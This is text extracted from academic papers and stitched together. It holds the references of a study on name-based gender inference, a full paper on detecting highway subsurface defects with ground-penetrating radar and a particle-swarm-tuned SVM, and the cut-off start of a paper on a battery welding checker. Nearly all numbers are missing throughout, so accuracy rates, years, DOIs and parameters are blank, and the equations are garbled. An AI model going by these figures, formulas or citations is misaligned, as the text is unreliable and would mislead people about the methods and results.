appreciate the two anonymous referees for carefully reading the manuscript and suggesting substantial improvements. santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding this work was supported by the grants programme of the international council for science (icsu), through project ‘‘a global approach to the gender gap in mathematical, computing, and natural sciences: how to measure it, how to reduce it?’’. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: grants programme of the international council for science (icsu). competing interests the authors declare there are no competing interests. author contributions • lucía santamaría conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft, prepared the paper for submission. • helena mihaljević conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft, set up code and data repository. data availability the following information was supplied regarding data availability: evaluation of name-based gender inference methods: https://github.com/ gendergapstem-publicationanalysis/name-gender-inference references blevins c, mullen l. . jane, john ... leslie? a historical method for algorithmic gender prediction. digital humanities quarterly ( ). bonham ks, stefan mi. a. gender in computational biology. available at https: //github.com/kescobo/gender-comp-bio. bonham ks, stefan mi. b. women are underrepresented in computational biology: an analysis of the scholarly literature in biology, computer science and computational biology. plos computational biology ( ): – doi . /journal.pcbi. . buolamwini j. . how i’m fighting bias in algorithms. available at https://www. media.mit.edu/posts/how-i-m-fighting-bias-in-algorithms/ . santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/gendergapstem-publicationanalysis/name-gender-inference https://github.com/gendergapstem-publicationanalysis/name-gender-inference https://github.com/kescobo/gender-comp-bio https://github.com/kescobo/gender-comp-bio http://dx.doi.org/ . /journal.pcbi. https://www.media.mit.edu/posts/how-i-m-fighting-bias-in-algorithms/ https://www.media.mit.edu/posts/how-i-m-fighting-bias-in-algorithms/ http://dx.doi.org/ . /peerj-cs. carsenat e. . onomastics to measure cultural bias in medical research. available at https://blog.namsor.com/ / / /onomastics-to-measure-cultural-bias-in- medical-research/ . demšar j. . statistical comparisons of classifiers over multiple data sets. journal of machine learning research : – . filardo g, da graca b, sass dm, pollock bd, smith eb, martinez mam. . trends and comparison of female first authorship in high impact medical journals: observational study ( – ). bmj :i doi . /bmj.i . frietsch r, haller i, funken-vrohlings m, grupp h. . gender-specific patterns in patenting and publishing. research policy ( ): – doi . /j.respol. . . . hastie t, tibshirani r, friedman j. . the elements of statistical learning. data mining, inference, and prediction. edition. new york: springer. holman l, stuart-fox d, hauser ce. . the gender gap in science: how long until women are equally represented? plos biology ( ): – doi . /journal.pbio. . japkowicz n, shah m. . evaluating learning algorithms. a classification perspective. new york: cambridge university press. karimi f, wagner c, lemmerich f, jadidi m, strohmaier m. . inferring gender from names on the web: a comparative evaluation of gender detection meth- ods. in: proceedings of the th international conference companion on world wide web, www’ companion. republic and canton of geneva, switzerland: international world wide web conferences steering committee, – doi . / . . larivière v, ni c, gingras y, cronin b, sugimoto cr. a. bibliometrics: global gender disparities in science. nature ( ): – doi . / a. larivière v, ni c, gingras y, cronin b, sugimoto cr. b. supplementary infor- mation to: global gender disparities in science (comment in nature , – ; ). nature ( ) doi . / a. macharia s, ndangam l, saboor m, franke e, parr s, opoku e. . who makes the news? global media monitoring project . available at http://whomakesthenews. org/gmmp- . matias jn. . how to identify gender in datasets at large scales, ethically and respon- sibly. available at https://civic.mit.edu/blog/natematias/best-practices-for-ethical- gender-research-at-very-large-scales. matias jn, szalavitz s, zuckerman e. . followbias: supporting behavior change toward gender equality by networked gatekeepers on social media. in: proceedings of the acm conference on computer supported cooperative work and social computing (cscw’ ). association for computing machinery (acm), – doi . / . . michael j. . namen, anredebestimmung anhand des vornamens. c’t : – . santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://blog.namsor.com/ / / /onomastics-to-measure-cultural-bias-in-medical-research/ https://blog.namsor.com/ / / /onomastics-to-measure-cultural-bias-in-medical-research/ http://dx.doi.org/ . /bmj.i http://dx.doi.org/ . /j.respol. . . http://dx.doi.org/ . /journal.pbio. http://dx.doi.org/ . / . http://dx.doi.org/ . / a http://dx.doi.org/ . / a http://whomakesthenews.org/gmmp- http://whomakesthenews.org/gmmp- https://civic.mit.edu/blog/natematias/best-practices-for-ethical-gender-research-at-very-large-scales https://civic.mit.edu/blog/natematias/best-practices-for-ethical-gender-research-at-very-large-scales http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. michael j. . dictionary of first names and gender. available at ftp://ftp.heise.de/pub/ ct/listings/ - .zip. mihaljević h, santamaría l. . evaluation of name-based gender inference methods. https://github.com/gendergapstem-publicationanalysis/name-gender-inference. mihaljević-brandt h, santamaría l, tullney m. . the effect of gender in the publication patterns in mathematics. plos one ( ): – doi . /journal.pone. . mozaffarian m, jamali hr. . iranian women in science: a gender study of scientific productivity in an islamic country. aslib proceedings ( ): – doi . / . mullen l. . gender: predict gender from names using historical data. available at https://github.com/ropensci/gender. naldi f, luzi d, valente a, vannini parenti i. . scientific and technological performance by gender. in: moed hf, glänzel w, schmoch u, eds. handbook of quantitative science and technology research: the use of publication and patent statistics in studies of s&t systems. dordrecht: springer netherlands, – . vanetta m. . gender detection. available at http://codingnews.info/post/gender- detection.html. vasilescu b, serebrenik a, filkov v. . a data set for social diversity studies of github teams. in: proceedings of the th working conference on mining software repositories, msr’ . piscataway: ieee press, – . wais k. . gender prediction methods based on first names with genderizer. the r journal ( ): – . west jd, jacquet j, king mm, correll sj, bergstrom ct. . the role of gender in scholarly authorship. plos one ( ):e doi . /journal.pone. . santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com ftp://ftp.heise.de/pub/ct/listings/ - .zip ftp://ftp.heise.de/pub/ct/listings/ - .zip https://github.com/gendergapstem-publicationanalysis/name-gender-inference http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . / https://github.com/ropensci/gender http://codingnews.info/post/gender-detection.html http://codingnews.info/post/gender-detection.html http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. submitted december accepted february published march corresponding author xinyu liu, lxy@ncwu.edu.cn academic editor pengcheng liu additional information and declarations can be found on page doi . /peerj-cs. copyright liu et al. distributed under creative commons cc-by . open access non-destructive detection of highway hidden layer defects using a ground- penetrating radar and adaptive particle swarm support vector machine xinyu liu , , , peiwen hao , aihui wang , liangqi zhang , bo gu and xinyan lu chang’an university, xian, china school of electric power, north china university of water resource and electric power, zhengzhou, china henan wanli road & bridge group co. ltd., xuchang, china zhongyuan university of technology, zhengzhou, china abstract in this paper, a method that uses a ground-penetrating radar (gpr) and the adaptive particle swarm support vector machine (svm) method is proposed for detecting and recognizing hidden layer defects in highways. three common road features, namely cracks, voids, and subsidence, were collected using ground-penetrating imaging. image segmentation was performed on acquired images. original features were extracted from thresholded binary images and were compressed using the kl algorithm. the svm classification algorithm was used for condition classification. for parameter optimization of the svm algorithm, the grid search method and particle swarm optimization algorithm were used. the recognition rate using the grid search method was . %; the pso approach often yielded local maxima, and the recognition rate was . %; the improved adaptive pso algorithm avoided local maxima and increased the recognition rate to . %. subjects adaptive and self-organizing systems, artificial intelligence, computer vision, scientific computing and simulation keywords ground penetrating radar (gpr), image segmentation, feature extraction, support vector machine (svm), grid search method, particle swarm optimization (pso) introduction many forms of road deterioration can develop after prolonged utilization of expressways; examples include crack formation, development of voids, and subsidence (marecos et al., ). the main cause of these conditions is the appearance of cracks under the roadbed, which gradually affects the road surface and causes surface cracks. continued use of expressways causes incremental damage and can significantly increase the amount and type of maintenance work. with increasing traffic volumes in china, it is necessary to develop more efficient and automated road condition-detection methods. much research has been conducted on using ground-penetrating radars (gprs) for landform surveys. with the continuous development of the gpr technology and with the improvement of detection accuracy, the use of the gpr technology for non-destructive how to cite this article liu x, hao p, wang a, zhang l, gu b, lu x. . non-destructive detection of highway hidden layer defects us- ing a ground-penetrating radar and adaptive particle swarm support vector machine. peerj comput. sci. :e http://doi.org/ . /peerj- cs. https://peerj.com/computer-science mailto:lxy@ncwu.edu.cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. http://doi.org/ . /peerj-cs. detection of structural road conditions has been garnering increasing attention. yuanlei et al. used the gpr technology to detect different physical anomalies, based on physical simulations and field tests, and the response characteristics across the two scenarios were consistent (si & wang, ). shili et al. used the gpr technology to detect hidden defects, such as road breaks, voids, and subsidence, and acquired defect images (guo, xu & li, ). literature (liang & su, ) uses amplitude attenuation method in ultrasonic testing to evaluate the corrosion damage of reinforced structures in concrete roads. document (mandal, tinjum & edil, ) detects the defects in concrete road base by ultrasonic detection technology and establishes the mathematical model of sound wave propagation in different media. literature (wen et al., ) establishes the mathematical model of ultrasonic wave propagation in asphalt pavement and concrete pavement to identify highway surface defects, analyzes its feasibility and realizes ultrasonic nondestructive testing of road defects based on this. using methods from the image recognition field, this study focuses on the design of shallow hidden defect classifiers based on the support vector machine (svm) algorithm. the svm method has been widely studied and applied in different contexts. hou improved the svm algorithm’s low precision around the hyperplane and reduced its computational complexity for processing large amounts of data; they also improved the algorithm’s training efficiency, and managed to reduce the number of false calls (hou et al., ). el-saadawi & hatata ( ) used the svm algorithm for the stator winding protection of synchronous generators, and achieved good results. the svm algorithm has been widely used in a variety of context, such as big data, medical, agricultural, and transportation applications (wang, du & wang, ; wang et al., ; zhang, hu & mao, ). using the svm algorithm, this study optimizes and improves its parameter selection process. by comparing the optimization performance of the grid search (gs) (liu & zhang, ) method and the particle swarm optimization (pso) (yang et al., ) algorithm, the superiority of the pso algorithm is demonstrated, and the svm classification algorithm for pso-based parameter optimization is studied (ma et al., ). by collecting radar images of three diseases on the national highway section from zhengzhou to xinxiang in henan province, it is shown that the obtained method performs well in detecting hidden pavement defects. image preprocessing and feature extraction detection principle of the ground penetrating radar in the gpr approach, the ground is irradiated by high-frequency electromagnetic waves using a transmitting antenna, while the waves reflected from the ground are detected using a receiving antenna. electromagnetic waves are reflected differently from different underground media; thus, different waveforms registered by the receiving computer for analysis (benedetto et al., ). figure shows the gpr detection process. the reflection coefficient of an electromagnetic wave mainly depends on the dielectric constants of the medium in which the wave travels originally and the medium from which the wave is reflected, as given by eqs. ( ) and ( ): liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure gpr detection process. full-size doi: . /peerjcs. /fig- figure image segmentation using the canny operator. (a) original image. (b) gauss filter image. (c) canny operator processing. full-size doi: . /peerjcs. /fig- v = √ ε − √ ε √ ε + √ ε ( ) v = c √ ε ( ) where, r is the reflection coefficient; ε ε are the relative dielectric constant of the incident medium and the medium from which the wave is reflected, v is the echo speed, and c is the speed of light in vacuum. selection of the ground penetrating radar the ground penetrating radar used in this study is ltd- ground penetrating radar system developed by china electronics technology group corporation. the main components of the system are mhz shielded antenna, data acquisition host, computer, data cable, etc. liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure morphological processing of digital images. (a) results obtained using the canny operator. (b) results obtained using morphological processing. full-size doi: . /peerjcs. /fig- image preprocessing the original images of roads detected by a gpr include the reflection characteristics of road conditions and various types of clutter caused by environmental factors. the clutter distribution is typically non-uniform, affecting the correct recognition and classification of road conditions. to improve the accuracy of the road condition determination, it is necessary to remove the effect of this clutter (bu, ). to extract the features associated with various road conditions, the acquired images should be segmented. image filtering. the objective of image filtering is to minimize the effects of noise and interference in raw images. the noise and interference are mainly attributed to the processes –image acquisition and image transmission. gaussian filtering is typically used for image denoising, which can remove unnecessary interference and protect the edge of the image. image segmentation. the objectives of image segmentation are to classify foreground and background pixels, and to determine the organization of foreground pixels (i.e., detect foreground objects) (fengjun et al., ). the canny operator has been widely used for image segmentation of radar images, and its segmentation performance after gaussian filtering is demonstrated in fig. . figure a is the original radar acquisition diagram. figure b is the result after gaussian transformation. it can be seen that the clutter in the original image is removed. figure c is the disease characteristic waveform diagram extracted after canny operator. to retain only the necessary information, the image was subjected to the morphological operations of liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure projection segmentation results. full-size doi: . /peerjcs. /fig- expansion and corrosion; the results are shown in fig. . figure a is the image after canny operator segmented the disease waveform. figure b is an enhanced disease waveform diagram after the segmented waveform is processed by digital morphology, so as to facilitate the extraction of disease features in the following text. the processed image was segmented and objects were extracted using the vertical projection method, as shown in fig. . feature extraction. feature extraction should satisfy the following requirements: ( ) features should have strong anti-interference ability; ( ) features should be insensitive to translation, rotation, and scale transformation of images; ( ) features should be insensitive liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table gray level co-occurrence matrix characteristics of cracks, voids, and subsidence. defect type crack glcm ◦ ◦ ◦ ◦ contrast . . . . correlation . . . . energy . . . . homogeneity . . . . defect type void glcm ◦ ◦ ◦ ◦ contrast . . . . correlation . . . . energy . . . . homogeneity . . . . defect type subsidence glcm ◦ ◦ ◦ ◦ contra . . . . correlation . . . . energy . . . . homogeneity . . . . table differential statistical matrix characteristics of cracks, voids, and subsidence. glds mean contrast asm ent crack . . . . void . . . . subsidence . . . . to geometric distortions; ( ) distance between similar images should be as small as possible; and ( ) distance between different images should be as large as possible. the algorithm for extracting feature vectors should be simple, and the dimensionality of the feature space should not be too high for ensuring the classification performance of the system (xiao & liu, ). to satisfy the above requirements, the following features were used: area, image complexity, image texture, and seven rectangular features. in this study, three types of road hazards are studied, namely, road cracking, hollowing, and subsidence. through simulation and actual images, combined with the classification of expert experience, three types of samples are collected to describe these conditions. twentynine feature vectors were extracted for each sample, and the obtained set of features is shown in tables , and . the dimensions of the different features are very different. direct use of feature data not only reduces the system performance, but also affects the classification accuracy. to avoid this shortcoming, it is necessary to perform data normalization (chowdhury et al., ). let the eigenvector of a pattern vector be x =(x ,x ,...,xm). then the normalized liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table seventh order invariant moment feature. seven-order hu moment crack void subsidence . . . . . . . . . . . . . . . . . . . . . eigenvector x′i is x′ij = . + . (xij−xi,min) xi,max−xi,min (i= , ,...,m) ( ) where, xi,max,xi,min are the maximum and minimum of {xi(k)|k− ,...,p}, and p is the overall number of samples in the training set. feature selection. in this study, k −l transformation was used as the feature selection algorithm (jun, ). k −l transformation can take into account different classification information and realize supervised feature extraction. under the criterion of minimum mean square error, it can obtain an orthogonal transformation matrix a that can map the original feature x ′ from high-dimensional space d to low-dimensional space vector y′. k−l transformation can retain the data component with the largest variance in the original data and highlight the data difference. empirical knowledge was used for removing several highly correlated features, and k−l changes were used for reducing the dimensionality of the original feature space. a relatively simple class-center classifier was used for identifying the samples after the k−l dimensionality reduction transformation. the recognition rate is shown in fig. for the test set. according to fig. , when the dimensionality of the feature space reaches , the recognition rate saturates; thus, the optimal dimensionality of the feature space is . k−l transformation can take into account different classification information, realize supervised extraction of features with too high correlation, and then use k−l transformation to extract data information from them, thus achieving the purpose of compressing dimensions and improving recognition rate. the svm classifier design basic principle of the svm svm is a binary classification algorithm that is trained using the supervised learning paradigm. the algorithm attempts to determine an optimal classification hyperplane, whereby the edge distance between two sample classes and the dividing hyperplane (decision boundary) is maximized. the larger the edge distance is, the more separated the two sample classes are, the stronger the classification robustness, and the better the liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure dependence of the recognition rate on the number of features. full-size doi: . /peerjcs. /fig- method’s generalizability (liu et al., ). the hyperplane equation is ω t x+b= ( ) whereω is the normal to the hyperplane, and x determines the angle with the hyperplane; b is the distance between the hyperplane and the origin. the hyperplane is denoted as (ω,b); then, the distance from a certain point (sample) to the hyperplane (ω,b) is denoted by r: r = ∣∣ωt x+b∣∣ ‖ω‖ ( ) let the support vector be and point away from the hyperplane, so that ∣∣ωt x+b∣∣= , and let the vectors in the two different classes be γ and point away from the hyperplane: γ = ||ω|| ( ) for optimal segmentation, we need to find the hyperplane with the largest interval; that is, we need to find the parameters ω and b that maximize γ . according to eq. ( ), only ‖ω‖− should be maximized. optimization of the svm classifier parameters we used matlab (mathworks, inc.) to validate the diagnostic accuracy of the svm- based classifier with respect to the road conditions. we obtained a dataset comprising liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure parameter optimization results of the grid search method. full-size doi: . /peerjcs. /fig- examples of road cracking, hollowing, and subsidence conditions; % of these images were used for training the method, while the remaining % were used for testing the classifier. the performance of any svm classifier depends on the penalty factor and kernel function parameters. the optimal parameter values are typically determined using the grid search approach, which exhausts the set of possible parameter combinations to determine the optimal combination. the penalty term c and the kernal function parameters g were considered to grow exponentially in the [ − , ] range; at the same time, the step between each cell on the grid was set to . , that is, the growth time-points were − , − . ,..., . as shown in fig. , the best classification performance was obtained for log (c)= . , best log (g) =− . . as shown in the retrieval results above, the accuracy of log (c) between [ , ] and log (g) between [ − , − ] was relatively good; thus, the step was set to . in this range, and the parameters were further optimized. the results are shown in fig. . according to fig. , the best classification was obtained for best= and best=− . . these optimal values were used as the svm classifier parameters for validating its classification performance; then, the accuracy of the classifier with these parameters was characterized. the validation results are shown in fig. , and the final validation accuracy rate was . %, the image recognition time is t = . s. adaptive mutation particle swarm the results obtained using the grid search approach can meet the desired detection requirements, but because the grid search approach only considers discrete combinations of parameters, the optimal solution can be easily missed. at the same time, the grid search liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure results obtained after refining the step size. full-size doi: . /peerjcs. /fig- figure test-set classification results after the grid search optimization of the svm classifier parame- ters. full-size doi: . /peerjcs. /fig- liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. method is exhaustive, and needs to consider all the possible cases; thus, this optimization approach is time-consuming. to improve the accuracy and reduce the computation time, the pso algorithm is proposed in this section. the pso approach. pso simulates a flock of birds, which are modeled as massless particles (hsieh et al., ). each particle has only two attributes: velocity v and position x. velocity represents the speed of movement, and position represents the direction of movement. each particle searches for the optimal solution separately in the search space, and records it as the current individual extreme value p; the individual extreme values are shared among all the particles in the entire swarm, and the optimal individual extreme value is determined as the current global optimal solution g of the entire swarm of particles. all of the particles in the particle swarm adjust their speeds and positions according to the current individual extremum p found by themselves and the current global optimal solution g shared by the entire particle swarm. the underlying pso process is relatively simple, and can be divided into the following steps: ( ) initializing the particle swarm; ( ) evaluating the particles, that is, calculating the fitness values; ( ) searching for individual extrema p; ( ) searching for the global optimal solution g; ( ) modifying the particles’ speeds and positions (yang, wang et al., ). the update equations are: vk+ id =ωv k id+c ·rand( , )·(p k id−x k id) +c ·rand( , )·(p k gd−x k id) xk+ id =x k id+v k+ id ( ) where ω is the inertia factor, c and c are the acceleration constants, and rand ( , ) are random numbers in the interval ( , ). pid denotes d the dimension of the individual extreme value of variable i.pgd represents the dimensionality d of the global optimal solution. k represents the current number of iterations. the pso approach. the following parameter values were used: c = ,c = , population size = , maximal number of iterations = , and cross-validation fold k = . the fitness curve for the optimized svm classifier parameters is shown in fig. . after iteration , the fitness reached its optimal value. at this point, the classifier accuracy was . %, the best c was . , and the best g was . . although the basic pso algorithm exhibits a good convergence speed and good optimization performance, it can prematurely converge onto a locally optimal solution; as a result, the population will easily stagnate without external pressure. variation improvement. to deal with the premature convergence problem, we utilized the concept of mutations that is often used in genetic algorithms, and incorporated mutations into the pso framework. for that, we defined a trigger to allow particles to escape locally optimal solutions, thus ensuring a global search (tong et al., ). the population fitness varianceσ was used for determining whether a local maximum was reached in the iteration process. the population fitness variance σ was defined as follows: σ = n∑ i= ( fi−favg f ) ( ) liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure fitness curve obtained after the pso. full-size doi: . /peerjcs. /fig- in the above equation, n is the number of particles, f is the normalized calibration factor, fi is the fitness of the first particle, and favg is the average fitness. it can be seen that the larger the value of σ , the more divergent the particle swarm; conversely, the smaller the population fitness variance, the more convergent the particle swarm is. values of σ close to zero indicate that the particle swarm is approaching the globally optimal solution or is converging onto a locally optimal solution. to avoid premature trapping of the particle swarm in local optima, the swarm is subjected to mutations: xi(k+ )=c ·rand( , )·xi(k) ( ) in the above equation, c is a normally distributed random number in the [ , ] interval and is the variation factor; rand( , ) is a random number in the [ , ] range; k is the number of iterations. mutations alter the particles’ positions and thus allow to escape local optima (deng et al., ). the fitness curve of the improved adaptive mutation pso algorithm for svm-based parameter optimization is shown in fig. . evidently, the best fitness converges to a local maximum after generations. mutations allow the particle swarm to escape this local maximum after generations; after that, optimization parameters are determined with higher accuracy. the finally estimated parameter values are: c = . , g = . . the fitness at this global optimum is . %. liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure fitness curve obtained after the variant pso. full-size doi: . /peerjcs. /fig- simulation results. based on the results in the previous section, the svm model was constructed using the following parameter values: c = . and g = . , which were determined using the pso method. the results are shown in fig. . for these parameter values, the accuracy of the model was . %, the image recognition time is t = . s; however, the recognition accuracy had not improved. the main explanation was the trapping of the particle swarm in a local optimum during the process of parameter optimization. an svm classifier was then constructed and validated using c = . and g = . ; these parameter values were determined using the adaptive mutation pso algorithm. the validation results are shown in fig. . from fig. , the classification accuracy of the svm classification model with the parameter values determined by the adaptive mutation pso was . %, the image recognition time is t = . s. this classification accuracy is significantly higher compared with that achieved by the svm method that uses parameters optimized by the grid search approach. conclusions according to the requirements of automatic recognition of highway hidden layer conditions, this paper proposes an automatic detection and recognition method that liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure validation results of the svm model, for conventional pso. full-size doi: . /peerjcs. /fig- uses an svm with parameters optimized using the adaptive mutation pso approach. in this method, pso with mutations is used for parameter optimization. in this study, three different methods were used for parameter optimization: ( ) the grid search method, ( ) the pso approach, and ( ) the adaptive mutation pso. matlab and python were used for implementing these optimization methods, and the optimization processes and their results were validated. compared with the grid search method and the simple pso approach, the accuracy of the svm with parameters optimized using mutation pso was higher, translating into better performance on automatic identification of highway conditions. our simulation results showed that the classification accuracy of the svm classifier with the grid search method was . %, the classification accuracy of the svm classifier with pso was . %, and the classification accuracy of the svm classifier with mutation pso was . %. thus, the effect of svm classifier with mutation pso is obviously better than that of the other two. compared with the grid search method, the classification accuracy was improved. however, owing to the pre-processing of images and processing of feature-related data, some defect-related information is likely to become distorted, which can affect the accuracy of recognition. if a zero-distortion image processing method can be found, the recognition accuracy will be greatly improved. at present, only cracks, voids and subsidence can be analyzed and studied, while asphalt pavement diseases and defects can be divided into categories and items. in order to better improve liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure validation results of the svm model, for variant pso. full-size doi: . /peerjcs. /fig- the scope of the identification system, further research should be done on other types of defects. additional information and declarations funding this work was supported by the key scientific research projects of higher education institutions in henan province (no. a ) and henan key youth teacher research project ( ggjs- ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: scientific research projects of higher education institutions in henan province: a . henan key youth teacher research project: ggjs- . liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. competing interests liangqi zhang is a postdoctoral supervisor in the postdoctoral workstation of wanli rord & bridge group co. ltd. xinyu liu is engaged in related research at this postdoctoral workstation. liangqi zhang is xinyu liu’s second mentor when he is a postdoctoral fellow. author contributions • xinyu liu conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. • peiwen hao and liangqi zhang performed the experiments, prepared figures and/or tables, and approved the final draft. • aihui wang performed the computation work, prepared figures and/or tables, and approved the final draft. • liangqi zhang performed the experiments, prepared figures and/or tables, and approved the final draft. • bo gu and xinyan lu analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: raw data and code are available in the supplementary files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references benedetto a, tosti f, bianchini ciampoli lb, d’amico f. . an overview of ground- penetrating radar signal processing techniques for road inspections. signal processing : – doi . /j.sigpro. . . . bu f. . a high-order clustering algorithm based on dropout deep learning for heterogeneous data in cyber-physical-social systems. ieee access : – . chowdhury sa, stepanov ea, danieli m, riccardi g. . automatic classification of speech overlaps: feature representation and algorithms. computer speech and language : – doi . /j.csl. . . . deng w, yao r, zhao h. . a novel intelligent diagnosis method using optimal ls-svm with improved pso algorithm. soft computing ( ): – doi . /s - - - . el-saadawi m, hatata a. . a novel protection scheme for synchronous generator stator windings based on svm. protection and control of modern power systems ( ): – . liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.sigpro. . . http://dx.doi.org/ . /j.csl. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. fengjun c, chenghan w, mengmeng gu, yandong z. . spruce image segmen- tation algorithm based on fully convolutional networks. transactions of the chinese society for agricultural machinery ( ): – . guo sl, xu l, li x-z. . application of gpr in detection of road surface settlement. progress in geophysics ( ): – doi . /pg bb . hou k, shao g, wang h. . research on practical power system stability analysis algorithm based on modified svm. protection and control of modern power systems ( ): – doi . /s - - - . hsieh yz, su mc, chen jh. . developing a pso-based projection algorithm for a porosity detection system using x-ray ct images of permeable concrete. ieee access : – doi . /access. . . jun n. . a data reduction algorithm based on k-l feature compression for cloud computing. microelectronics and computer ( ): – . liang m-t, su p-j. . detection of the corrosion damage of rebar in concrete using impact-echo method. cement and concrete research : – doi . /s - ( ) - . liu y, li x, li s, zhu x. . imbalanced dataset classification algorithm based on improved support vector machine. journal of shihezi university (natural science) ( ): – . liu x, zhang z. . parameter optimization of support vector machine based on improved grid search method. journal of jiangxi university of science and technology ( ): – . ma z, dong y, liu h, shao x, wang c. . method of forecasting non-equal interval track irregularity based on improved grey model and pso-svm. ieee access : – doi . /access. . . mandal t, tinjum jm, edil tb. . non-destructive testing of cementitiously stabilized materials using ultrasonic pulse velocity test. transportation geotechnics : – doi . /j.trgeo. . . . marecos v, solla m, fontul s, antunes v. . assessing the pavement subgrade by combining different non-destructive methods. construction and building materials : – doi . /j.conbuildmat. . . . si y, wang gl. . study on the response characteristics of different physical anoma- lies in the detection of ground-penetrating radar. journal of yunnan university (natural sciences edition) ( ): – . tong y, zhong m, li j, li d, wang y. . research on intelligent welding robot path optimization based on ga and pso algorithms. ieee access : – doi . /access. . . wang w, du x, wang n. . building a cloud ids using an efficient feature selection method and svm. ieee access : – doi . /access. . . wang c, zhang y, song j. . a novel optimized svm algorithm based on pso with saturation and mixed time-delays for classification of oil pipeline leak detection. sys- tems science and control engineering ( ): – doi . / . . . liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /pg bb http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /access. . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /access. . http://dx.doi.org/ . /j.trgeo. . . http://dx.doi.org/ . /j.conbuildmat. . . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . / . . http://dx.doi.org/ . /peerj-cs. wen mb, edil t, tinjum j, gokce a, wang j. . characterization of cementitiously stabilized layers for use in pavement design and analysis. project – test procedure evaluation report national cooperative highway research program, washington, d.c., usa. xiao z, liu h. . adaptive features fusion and fast recognition of potato typical disease images. transactions of the chinese society for agricultural machinery ( ): – . yang j, wang x. . extended pso based collaborative searching for robotic swarms with practical constraints. ieee access : – doi . /access. . . yang l, zhichuan z, alin h. . pulmonary nodule recognition based on multiple kernel learning support vector machine-pso. computational and mathematical methods in medicine : – . zhang h, hu yx, mao hp. . image recognition and classification of the stored- grain pests based on support vector machine. journal of agricultural mechanization research : – . liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /access. . http://dx.doi.org/ . /peerj-cs. 蓄電池焊接點檢查機之研製 implementation of an automatic checking machine for battery welding condition kuen-cheng wang, chih-hung wang, tsair-rong chen department of electrical engineering national changhua university of education , shida road, changhua, taiwan, e-mail: kuenbao@ms .hinet.net abstract. the common automobile battery is composed of series connection of six units of battery chargers, with the tab welded between each battery charger for a purpose of connection. thus the satisfactory welding point will be closely related to the lifetime of the battery. if the welding point is not solid enough, it will produce high resistance and heat in welding point upon numerous current discharge and charge, thus leading to a breakage of the welding point and causing damage to battery. this essay aims to implement a checking machine for battery welding condition. this machine based on a microprocessor as the core of control by combining a direct current power supply to measure the internal resistance of welding point of the battery so that the condition of the welding point can be judged. upon the signal of inner resistance goes through an amplifier and then a buffer circuit, this analog signal will be converted into a digital signal and then be conveyed to the microprocessor. finally, the configuration is displayed by an led, which also reveals the results of 